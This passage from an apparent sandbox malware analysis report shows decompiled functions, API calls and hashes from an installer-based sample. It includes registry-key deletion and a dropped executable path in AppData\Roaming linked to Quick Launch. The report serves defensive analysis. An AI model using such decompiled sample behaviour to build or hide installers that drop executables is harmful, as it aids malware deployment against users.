                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                            • String ID:
                            • API String ID: 2667972263-0
                            • Opcode ID: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
                            • Instruction ID: 8fc1a79e9ee36ebd610a2d663d7387b5f1fea8f48d7bc9e01940cd119f3fb53c
                            • Opcode Fuzzy Hash: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
                            • Instruction Fuzzy Hash: 5831C271D00124BBCF216FA9CE49DDEBE79AF49364F14023AF450762E0CB794C429BA8
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00405A6E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00405A6E(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f8;
				_v36.Group = 0x4083f8;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e8;
				_v16.nLength = 0xc;
				if(CreateDirectoryW(_a4,  &_v16) != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}






                            0x00405a79
                            0x00405a7d
                            0x00405a80
                            0x00405a86
                            0x00405a8a
                            0x00405a8e
                            0x00405a96
                            0x00405a9d
                            0x00405aa3
                            0x00405aaa
                            0x00405ab9
                            0x00405abb
                            0x00000000
                            0x00405abb
                            0x00405ac5
                            0x00405acc
                            0x00405ae2
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00405ae4
                            0x00405ae8

                            APIs
                            • CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                            • GetLastError.KERNEL32 ref: 00405AC5
                            • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405ADA
                            • GetLastError.KERNEL32 ref: 00405AE4
                            Strings
                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A94
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                            • String ID: C:\Users\user\AppData\Local\Temp\
                            • API String ID: 3449924974-3081826266
                            • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                            • Instruction ID: 637b0a295f6611997b04f2fb2f8121e2d74ae93851c1d74b8ff7b710bfe1865b
                            • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                            • Instruction Fuzzy Hash: 1A010871D04219EAEF019BA0DD84BEFBBB4EB14314F00813AD545B6281E7789648CFE9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 48%
                            			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				short _v536;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004063AA(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v536);
						_push(0);
						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v536);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E0040690A(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyW(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}












                            0x00402eb4
                            0x00402ebd
                            0x00402ec6
                            0x00402ed2
                            0x00402edb
                            0x00402ee5
                            0x00402f0a
                            0x00402f10
                            0x00402f15
                            0x00402f16
                            0x00402f46
                            0x00402f1f
                            0x00402f21
                            0x00402f71
                            0x00402f74
                            0x00000000
                            0x00402f7a
                            0x00402f30
                            0x00402f35
                            0x00402f37
                            0x00000000
                            0x00000000
                            0x00402f3f
                            0x00402f44
                            0x00402f45
                            0x00402f45
                            0x00402f52
                            0x00402f5a
                            0x00402f61
                            0x00000000
                            0x00402f8a
                            0x00000000
                            0x00402f69
                            0x00402ef5
                            0x00402f08
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00402f08
                            0x00402f90

                            APIs
                            • RegEnumValueW.ADVAPI32 ref: 00402EFD
                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: CloseEnum$DeleteValue
                            • String ID:
                            • API String ID: 1354259210-0
                            • Opcode ID: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
                            • Instruction ID: ca6229ec891c5908b4c2d3bab14ae3db7b9396451d72a40731f1c02386a45f13
                            • Opcode Fuzzy Hash: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
                            • Instruction Fuzzy Hash: DA215A7150010ABBEF119F90CE89EEF7B7DEB50384F100076F909B21A0D7B49E54AA68
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                            Download Yara Rule
                            C-Code - Quality: 77%
                            			E00401D81(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				WCHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t60;
				long _t63;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
				} else {
					E00402D84(2);
					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
				}
				_t55 =  *(_t65 - 0x24);
				 *(_t65 + 8) = _t30;
				_t60 = _t55 & 0x00000004;
				 *(_t65 - 0x38) = _t55 & 0x00000003;
				 *(_t65 - 0x18) = _t55 >> 0x1f;
				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
				} else {
					_t38 = E00402DA6(0x11);
				}
				 *(_t65 - 0x44) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x60);
				asm("sbb esi, esi");
				_t63 = LoadImageW( ~_t60 &  *0x434f00,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
					_push(_t63);
					E00406484();
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}











                            0x00401d81
                            0x00401d85
                            0x00401d9a
                            0x00401d87
                            0x00401d89
                            0x00401d8f
                            0x00401d8f
                            0x00401da0
                            0x00401da3
                            0x00401dad
                            0x00401db0
                            0x00401db8
                            0x00401dc9
                            0x00401dcc
                            0x00401dd7
                            0x00401dce
                            0x00401dd0
                            0x00401dd0
                            0x00401ddb
                            0x00401de5
                            0x00401e0c
                            0x00401e1b
                            0x00401e29
                            0x00401e31
                            0x00401e39
                            0x00401e39
                            0x00401e42
                            0x00401e48
                            0x00402ba4
                            0x00402ba4
                            0x00402c2d
                            0x00402c39

                            APIs
                            • GetDlgItem.USER32 ref: 00401D9A
                            • GetClientRect.USER32(?,?), ref: 00401DE5
                            • LoadImageW.USER32 ref: 00401E15
                            • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                            • DeleteObject.GDI32(00000000), ref: 00401E39
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                            • String ID:
                            • API String ID: 1849352358-0
                            • Opcode ID: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
                            • Instruction ID: b69f8f45c5cbb28dd5603d9b1d667d2ce3d3910c133b75fee4ecc707c572ca23
                            • Opcode Fuzzy Hash: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
                            • Instruction Fuzzy Hash: 3321F672904119AFCB05DBA4DE45AEEBBB5EF08314F14003AFA45F62A0DB389951DB98
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00401E4E Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                            Download Yara Rule
                            C-Code - Quality: 73%
                            			E00401E4E(intOrPtr __edx) {
				void* __edi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				void* _t31;
				struct HDC__* _t33;
				void* _t35;

				_t30 = __edx;
				_t33 = GetDC( *(_t35 - 8));
				_t9 = E00402D84(2);
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				0x40cdf0->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t33);
				 *0x40ce00 = E00402D84(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x20));
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				 *0x40ce07 = 1;
				 *0x40ce04 = _t15 & 0x00000001;
				 *0x40ce05 = _t15 & 0x00000002;
				 *0x40ce06 = _t15 & 0x00000004;
				E0040657A(_t9, _t31, _t33, 0x40ce0c,  *((intOrPtr*)(_t35 - 0x2c)));
				_t18 = CreateFontIndirectW(0x40cdf0);
				_push(_t18);
				_push(_t31);
				E00406484();
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}











                            0x00401e4e
                            0x00401e59
                            0x00401e5b
                            0x00401e68
                            0x00401e7f
                            0x00401e84
                            0x00401e91
                            0x00401e96
                            0x00401e9a
                            0x00401ea5
                            0x00401eac
                            0x00401ebe
                            0x00401ec4
                            0x00401ec9
                            0x00401ed3
                            0x00402638
                            0x0040156d
                            0x00402ba4
                            0x00402c2d
                            0x00402c39

                            APIs
                            • GetDC.USER32(?), ref: 00401E51
                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                            • ReleaseDC.USER32 ref: 00401E84
                              • Part of subcall function 0040657A: lstrcatW.KERNEL32(C:\Users\user\AppData\Roaming\34432.exe,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                              • Part of subcall function 0040657A: lstrlenW.KERNEL32(C:\Users\user\AppData\Roaming\34432.exe,00000000,0042C248,?,004055D6,0042C248,00000000), ref: 00406779
                            • CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED3
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                            • String ID:
                            • API String ID: 2584051700-0
                            • Opcode ID: 0465d2832808ea9d6fff4b9245e4cab849096788d5b9b76ed02900a81bf07427
                            • Instruction ID: 78b13ae86a0973dc2b43aa2eb6c1af0beb3c1ef463c522f55250376beecb9f8a
                            • Opcode Fuzzy Hash: 0465d2832808ea9d6fff4b9245e4cab849096788d5b9b76ed02900a81bf07427
                            • Instruction Fuzzy Hash: 7001B571904241EFEB005BB0EE49B9A3FB4BB15301F108A39F541B71D2C7B904458BED
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                            Download Yara Rule
                            C-Code - Quality: 59%
                            			E00401C43(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t63;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402D84(3);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 - 0x18) = _t29;
				_t30 = E00402D84(4);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
				}
				__eflags =  *(_t64 - 0x1c) & 0x00000002;
				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402DA6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t61 = E00402DA6();
					_t32 = E00402DA6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t61;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t63 = E00402D84();
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t41 = E00402D84(2);
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t56 =  *(_t64 - 0x1c) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x38) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
					_push( *(_t64 - 0x38));
					E00406484();
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}















                            0x00401c43
                            0x00401c45
                            0x00401c4c
                            0x00401c4f
                            0x00401c52
                            0x00401c5c
                            0x00401c60
                            0x00401c63
                            0x00401c6c
                            0x00401c6c
                            0x00401c6f
                            0x00401c73
                            0x00401c7c
                            0x00401c7c
                            0x00401c7f
                            0x00401c83
                            0x00401c85
                            0x00401cda
                            0x00401cdc
                            0x00401ce7
                            0x00401cf1
                            0x00401cf4
                            0x00401cf4
                            0x00401cfd
                            0x00000000
                            0x00401c87
                            0x00401c8e
                            0x00401c90
                            0x00401c93
                            0x00401c99
                            0x00401ca0
                            0x00401ca3
                            0x00401ccb
                            0x00401d03
                            0x00401d03
                            0x00401ca5
                            0x00401cb3
                            0x00401cbb
                            0x00401cbe
                            0x00401cbe
                            0x00401ca3
                            0x00401d06
                            0x00401d09
                            0x00401d0f
                            0x00402ba4
                            0x00402ba4
                            0x00402c2d
                            0x00402c39

                            APIs
                            • SendMessageTimeoutW.USER32 ref: 00401CB3
                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: MessageSend$Timeout
                            • String ID: !
                            • API String ID: 1777923405-2657877971
                            • Opcode ID: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                            • Instruction ID: 549e056fbb7746b1afa8e7352ee9f1cbf83a3633853e14f9ff1f16dc1dd81c22
                            • Opcode Fuzzy Hash: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                            • Instruction Fuzzy Hash: 46219C7190420AAFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00404D46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 77%
                            			E00404D46(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E0040657A(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E0040657A(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E0040657A(_t44, _t50, 0x42d268, 0x42d268, _a8);
				wsprintfW(_t34 + lstrlenW(0x42d268) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x433ed8, _a4, 0x42d268);
			}



















                            0x00404d4f
                            0x00404d54
                            0x00404d5c
                            0x00404d5d
                            0x00404d6a
                            0x00404d72
                            0x00404d73
                            0x00404d75
                            0x00404d77
                            0x00404d79
                            0x00404d7c
                            0x00404d7c
                            0x00404d83
                            0x00404d89
                            0x00404d89
                            0x00404d90
                            0x00404d97
                            0x00404d9a
                            0x00404d9d
                            0x00404d9d
                            0x00404da1
                            0x00404db1
                            0x00404db3
                            0x00404db6
                            0x00404d5f
                            0x00404d5f
                            0x00404d66
                            0x00404d66
                            0x00404dbe
                            0x00404dc9
                            0x00404ddf
                            0x00404df0
                            0x00404e0c

                            APIs
                            • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
                            • wsprintfW.USER32 ref: 00404DF0
                            • SetDlgItemTextW.USER32 ref: 00404E03
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: ItemTextlstrlenwsprintf
                            • String ID: %u.%u%s%s
                            • API String ID: 3540041739-3551169577
                            • Opcode ID: 06d0c97e576fd12928d3ccf504f16285b7ed678bb4ff82b9d12c133dfbf75c1e
                            • Instruction ID: d7f2b51e3f2153b105aad6c1cbcae815e44f670c765de83d30fbb221df5484fa
                            • Opcode Fuzzy Hash: 06d0c97e576fd12928d3ccf504f16285b7ed678bb4ff82b9d12c133dfbf75c1e
                            • Instruction Fuzzy Hash: AC11D573A041283BDB10656DAC45E9E369CAF81334F254237FA66F21D1EA78D91182E8
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00405E0C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 58%
                            			E00405E0C(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}




                            0x00405e0d
                            0x00405e1a
                            0x00405e1b
                            0x00405e26
                            0x00405e2e
                            0x00405e2e
                            0x00405e36

                            APIs
                            • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E12
                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E1C
                            • lstrcatW.KERNEL32(?,0040A014), ref: 00405E2E
                            Strings
                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E0C
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: CharPrevlstrcatlstrlen
                            • String ID: C:\Users\user\AppData\Local\Temp\
                            • API String ID: 2659869361-3081826266
                            • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                            • Instruction ID: 1a595bf39a0a3392b99637bd72bd9cca8666c17676e511d5d4bf90e80f698eee
                            • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                            • Instruction Fuzzy Hash: A8D0A731101930BAC2127B49EC08DDF62ACAE89340341443BF145B30A4CB7C5E5187FD
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00403019 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00403019(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x42aa20; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x434f0c;
						if(_t2 >  *0x434f0c) {
							_t3 = CreateDialogParamW( *0x434f00, 0x6f, 0, E00402F93, 0);
							 *0x42aa20 = _t3;
							return ShowWindow(_t3, 5);
